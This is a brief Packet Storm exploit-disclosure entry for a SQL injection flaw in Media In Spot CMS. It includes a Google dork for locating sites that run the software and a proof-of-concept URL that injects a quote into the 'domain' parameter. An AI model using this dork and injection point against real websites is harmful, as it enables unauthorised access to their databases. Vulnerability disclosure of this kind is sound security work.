Media In Spot CMS SQL Injection

2011-05-17T00:00:00
ID PACKETSTORM:101478
Type packetstorm
Reporter Iolo Morganwg
Modified 2011-05-17T00:00:00

Description

                                        
                                            `# Exploit Title: Media In Spot SQL Injection  
# Google Dork: intext:""Powered By Media In Spot"  
# Date: 16/05/2011  
# Author: Iolo Morganwg  
# Category: Web App  
# Version: PHP  
# Tested on: Windows XP  
# Vendor: http://www.mediainspot.com/  
# Note: domain parameter is vulnerable to sql injection  
  
# Vulnerability  
http://site/view/lang/index.php?page=area.php&domain=3%27  
  
`